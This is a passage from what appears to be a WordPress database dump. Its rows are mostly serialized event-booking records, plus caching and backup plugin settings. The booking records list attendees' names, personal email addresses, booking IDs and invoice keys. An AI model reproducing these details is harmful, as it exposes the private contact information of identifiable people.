Fernando Valley California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6842497,'EFA15402','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1668948300:1668952800\";s:8:\"event_id\";s:6:\"267433\";s:19:\"translated_event_id\";s:6:\"267433\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267517;s:11:\"invoice_key\";s:32:\"0baf6e3a41c800eeb00567c019fa9a1b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6846041,'SMY83311','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1668948300:1668952800\";s:8:\"event_id\";s:6:\"267433\";s:19:\"translated_event_id\";s:6:\"267433\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267518;s:11:\"invoice_key\";s:32:\"17522be9e7adc8efce1ef31bc446c910\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6870159,'wpcode_admin_notices','a:1:{s:14:\"review_request\";a:2:{s:4:\"time\";i:1669395234;s:9:\"dismissed\";b:0;}}','yes'),(6879745,'SCQ96323','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"assika@guyerne.com\";s:4:\"name\";s:8:\"Guy-Erne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1671363900:1671368400\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267550;s:11:\"invoice_key\";s:32:\"10ecf78584ef482d4942a4acc3b36693\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"assika@guyerne.com\";s:4:\"name\";s:8:\"Guy-Erne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6928233,'CAP72345','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1670754600:1670758200\";s:8:\"event_id\";s:6:\"267554\";s:19:\"translated_event_id\";s:6:\"267554\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267560;s:11:\"invoice_key\";s:32:\"9580dad28c40f566f95a78c0fea7379a\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6929927,'TMC76720','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"huuu4luv@xplornet.com\";s:4:\"name\";s:16:\"Marlene Chapelle\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1670754600:1670758200\";s:8:\"event_id\";s:6:\"267554\";s:19:\"translated_event_id\";s:6:\"267554\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267561;s:11:\"invoice_key\";s:32:\"bd249a4b5dc5566db26dc19e8fa808d5\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"huuu4luv@xplornet.com\";s:4:\"name\";s:16:\"Marlene Chapelle\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6930274,'LOW74542','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1670754600:1670758200\";s:8:\"event_id\";s:6:\"267554\";s:19:\"translated_event_id\";s:6:\"267554\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267562;s:11:\"invoice_key\";s:32:\"9cb3b547f9af9ed7708588399888d0f9\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6930325,'DZP26574','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1670754600:1670758200\";s:8:\"event_id\";s:6:\"267554\";s:19:\"translated_event_id\";s:6:\"267554\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267563;s:11:\"invoice_key\";s:32:\"afe0b6f6ce80281c086d75c81168c23b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6934717,'KWF87636','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1671359400:1671363000\";s:8:\"event_id\";s:6:\"267539\";s:19:\"translated_event_id\";s:6:\"267539\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267564;s:11:\"invoice_key\";s:32:\"41e7bb0652f5eb29982b456fd328b288\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6947123,'updraft_pcloud','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-752e3a2636e6a6e041d608117c10e327\";a:0:{}}}','yes'),(6953539,'WZX17855','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:16:\"azpaulfh@aol.com\";s:4:\"name\";s:11:\"Paul Hanson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1671359400:1671363000\";s:8:\"event_id\";s:6:\"267539\";s:19:\"translated_event_id\";s:6:\"267539\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267582;s:11:\"invoice_key\";s:32:\"f48e1d0f71ed3baefac1f067ebd12f26\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:16:\"azpaulfh@aol.com\";s:4:\"name\";s:11:\"Paul Hanson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6954033,'JSG10325','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:16:\"einwrm@gmail.com\";s:4:\"name\";s:12:\"Elijah Beard\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1671363900:1671368400\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267583;s:11:\"invoice_key\";s:32:\"16815115984c6cf87d0322d8bd2dc894\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:16:\"einwrm@gmail.com\";s:4:\"name\";s:12:\"Elijah Beard\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6954110,'KNF20107','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"nkemjikaugbaja@aol.com\";s:4:\"name\";s:12:\"Brown Ugbaja\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1673173800:1673177400\";s:8:\"event_id\";s:6:\"267577\";s:19:\"translated_event_id\";s:6:\"267577\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267584;s:11:\"invoice_key\";s:32:\"fad5f2793debbffe6d9da61e8b01985b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"nkemjikaugbaja@aol.com\";s:4:\"name\";s:12:\"Brown Ugbaja\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6955372,'EFN27658','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"gai.lawson@icloud.com\";s:4:\"name\";s:10:\"Gai Lawson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1673173800:1673177400\";s:8:\"event_id\";s:6:\"267577\";s:19:\"translated_event_id\";s:6:\"267577\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267585;s:11:\"invoice_key\";s:32:\"c74b6fd4ae9fb4e154cbbc6aab464de2\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"gai.lawson@icloud.com\";s:4:\"name\";s:10:\"Gai Lawson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6955619,'PWO99875','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1671363900:1671368400\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267587;s:11:\"invoice_key\";s:32:\"fcb0871fb193ae51314c3801bea12ac9\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6955781,'JSW98977','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1671363900:1671368400\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267588;s:11:\"invoice_key\";s:32:\"9f3e386a7a8f3a5ca3322d90fd373238\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6955805,'HPY63199','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:11:\"Chukwuebuka\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1671363900:1671368400\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267589;s:11:\"invoice_key\";s:32:\"41061f34c17ceece4195407f03076b73\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"ocekenedili@yahoo.com\";s:4:\"name\";s:11:\"Chukwuebuka\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6964822,'w3tc_state','{\"common.install\":1671658155,\"common.install_version\":\"2.2.9\",\"license.status\":\"no_key\",\"license.next_check\":1672090155,\"license.terms\":\"\",\"license.community_terms\":\"decline\",\"minify.hide_minify_help\":true,\"common.show_note.flush_posts_needed\":false,\"common.show_note.flush_posts_needed.timestamp\":1671816734,\"common.show_note.flush_statics_needed\":false,\"common.show_note.flush_statics_needed.timestamp\":1671658964,\"common.show_note.plugins_updated\":false,\"common.show_note.plugins_updated.timestamp\":1671816734,\"minify.show_note.need_flush\":false,\"minify.show_note.need_flush.timestamp\":1671816711,\"objectcache.show_note.flush_needed\":false,\"objectcache.show_note.flush_needed.timestamp\":1671658964}','no'),(6965281,'w3tc_browsercache_flush_timestamp','69772','yes'),(6965289,'w3tc_setupguide_completed','1671658636','no'),(6965335,'w3tc_minify','{\"d52ed.js\":[\"wp-includes\\/js\\/jquery\\/jquery.min.js\"],\"1615d.js\":[\"wp-content\\/plugins\\/w3-total-cache\\/pub\\/js\\/lazyload.min.js\"],\"cc4e0.js\":[\"wp-content\\/cache\\/autoptimize\\/js\\/autoptimize_37fba89bc648ed5518c0e1e48a976dc9.js\"],\"17cba.css\":[\"wp-content\\/cache\\/autoptimize\\/css\\/autoptimize_70cefa5ff21ed7a55b6c513dd0edf577.css\"],\"41ff2.js\":[\"wp-includes\\/js\\/admin-bar.min.js\",\"wp-includes\\/js\\/jquery\\/jquery.min.js\"],\"84b14.js\":[\"wp-content\\/cache\\/autoptimize\\/js\\/autoptimize_dadb8dbd8e83bbe359bc00319e771273.js\"],\"7d6e2.css\":[\"wp-content\\/cache\\/autoptimize\\/css\\/autoptimize_5ec69d7385f3c92263b8139751a503fb.css\"],\"18766.css\":[\"wp-includes\\/css\\/dashicons.min.css\",\"wp-includes\\/css\\/admin-bar.min.css\",\"wp-content\\/plugins\\/wp-mail-smtp\\/assets\\/css\\/admin-bar.min.css\"],\"5822d.js\":[\"wp-content\\/cache\\/autoptimize\\/js\\/autoptimize_5c00655205823e27513a3d9c6629da47.js\"],\"f404c.css\":[\"wp-content\\/cache\\/autoptimize\\/css\\/autoptimize_644e8d6039bafdb06d9b40ed3e9d58d1.css\",\"wp-includes\\/css\\/dashicons.min.css\"],\"3a125.css\":[\"wp-content\\/cache\\/autoptimize\\/css\\/autoptimize_652602d560c0ed00f21f8af85b161f0a.css\"],\"01fcd.css\":[\"wp-content\\/cache\\/autoptimize\\/css\\/autoptimize_a08aa64f84d51d497dbe860352eaf0db.css\"],\"a98d7.js\":[\"wp-content\\/cache\\/autoptimize\\/js\\/autoptimize_7b4d6b9468c6ae8a36df579f8a1e6953.js\"],\"6b0a2.css\":[\"wp-content\\/cache\\/autoptimize\\/css\\/autoptimize_316a1bb65c9d065b559b4bf01dbaebfc.css\",\"wp-content\\/cache\\/autoptimize\\/css\\/autoptimize_a6c9892c3cd84c87f4beff6495e9ffb3.css\"]}','no'),(6970897,'w3tc_generic_widgetservices','{\"content\":{\"items\":[{\"name\":\"Premium Support Response (Usually <1h First Response)\",\"parameter_name\":\"field4\",\"parameter_value\":\"Premium Support Response (Usually <1h First Response)\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Performance Audit \\/ Consult (Theme, Plugin, Content, Server)\",\"parameter_name\":\"field4\",\"parameter_value\":\"Performance Audit \\/ Consult (Theme, Plugin, Content, Server)\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Plugin Configuration\",\"parameter_name\":\"field4\",\"parameter_value\":\"Plugin Configuration\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"SSL Performance Setup\",\"parameter_name\":\"field4\",\"parameter_value\":\"SSL Performance Setup\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Full Site Delivery Setup\",\"parameter_name\":\"field4\",\"parameter_value\":\"Full Site Delivery Setup\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Hosting Environment Troubleshooting\",\"parameter_name\":\"field4\",\"parameter_value\":\"Hosting Environment Troubleshooting\",\"form_hash\":\"m5pom8z0qy59rm\"},{\"name\":\"Performance Monitoring\",\"parameter_name\":\"field4\",\"parameter_value\":\"Performance Monitoring\",\"form_hash\":\"m5pom8z0qy59rm\"}],\"ui_strings\":{\"cdn.maxcdn.signUpAndSave\":\"Sign Up Now and save !\",\"cdn.maxcdn.signUpAndSave.description\":\"MaxCDN is a service that lets you speed up your site even more with W3 Total Cache. Sign up now to recieve a special offer!\",\"cdn.stackpath.signUpAndSave\":\"Sign Up Now and save !\",\"cdn.stackpath.signUpAndSave.description\":\"StackPath is a service that lets you speed up your site even more with W3 Total Cache. Sign up now and save!\",\"cdn.stackpath2.signUpAndSave\":\"Sign Up Now and save !\",\"cdn.stackpath2.signUpAndSave.description\":\"StackPath is a service that lets you speed up your site even more with W3 Total Cache. Sign up now to recieve a special offer!\",\"minify.general.header\":\"Reduce load time by decreasing the size and number of <acronym title=\'Cascading Style Sheet\'>CSS<\\/acronym> and <acronym title=\'JavaScript\'>JS<\\/acronym> files. Automatically remove unncessary data from <acronym title=\'Cascading Style Sheet\'>CSS<\\/acronym>, <acronym title=\'JavaScript\'>JS<\\/acronym>, feed, page and post <acronym title=\'Hypertext Markup Language\'>HTML<\\/acronym>.\",\"newrelic.general.header\":\"New Relic may not be installed or not active on this server. <a href=\'%s\' target=\'_blank\'>Sign up for a (free) account<\\/a>. Visit <a href=\'%s\' target=\'_blank\'>New Relic<\\/a> for installation instructions.\",\"reverseproxy.general.header\":\"A reverse proxy adds scale to an server by handling requests before WordPress does. Purge settings are set on the <a href=\'%s\'>Page Cache settings<\\/a> page and <a href=\'%s\'>Browser Cache settings<\\/a> are set on the browser cache settings page.\",\"cdnfsd.general.header\":\"Host the entire website with your compatible <acronym title=\'Content Delivery Network\'>CDN<\\/acronym> provider to reduce page load time.\",\"cdn.general.header\":\"Host static files with your <acronym title=\'Content Delivery Network\'>CDN<\\/acronym> to reduce page load time.\",\"cdn.stackpath.widget.existing\":\"If you\'re an existing StackPath customer, enable <acronym title=\'Content Delivery Network\'>CDN<\\/acronym> and:\",\"cdn.stackpath2.widget.existing\":\"If you\'re an existing StackPath customer, enable <acronym title=\'Content Delivery Network\'>CDN<\\/acronym> and:\",\"cdn.stackpath2.widget.works_magically\":\"StackPath works magically with W3 Total Cache.\",\"cdn.stackpath.widget.header\":\"Dramatically increase website speeds in just a few clicks! Add the StackPath content delivery network (<acronym title=\'Content Delivery Network\'>CDN<\\/acronym>) service to your site.\",\"cdn.stackpath2.widget.header\":\"Dramatically increase website speeds in just a few clicks! Add the StackPath content delivery network (<acronym title=\'Content Delivery Network\'>CDN<\\/acronym>) service to your site.\"}},\"expires\":1672421460}','no'),(6990785,'updraft_remotesites','','yes'),(6990786,'updraft_migrator_localkeys','','yes'),(6990787,'updraft_central_localkeys','','yes'),(7018660,'HUW88257','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"bjinlohi@gmail.com\";s:4:\"name\";s:9:\"BJ Wagner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1673173800:1673177400\";s:8:\"event_id\";s:6:\"267577\";s:19:\"translated_event_id\";s:6:\"267577\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:267616;s:11:\"invoice_key\";s:32:\"6c2e74da7df082db640c81e300d6bdcf\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"bjinlohi@gmail.com\";s:4:\"name\";s:9:\"BJ Wagner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(7231753,'XWY27893','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"elainedahl@yahoo.com\";s:4:\"name\";s:15:\"Elaine Dahlgren\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1678012200:1678059000\";s:8:\"event_id\";s:6:\"268025\";s:19:\"translated_event_id\";s:6:\"268025\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets 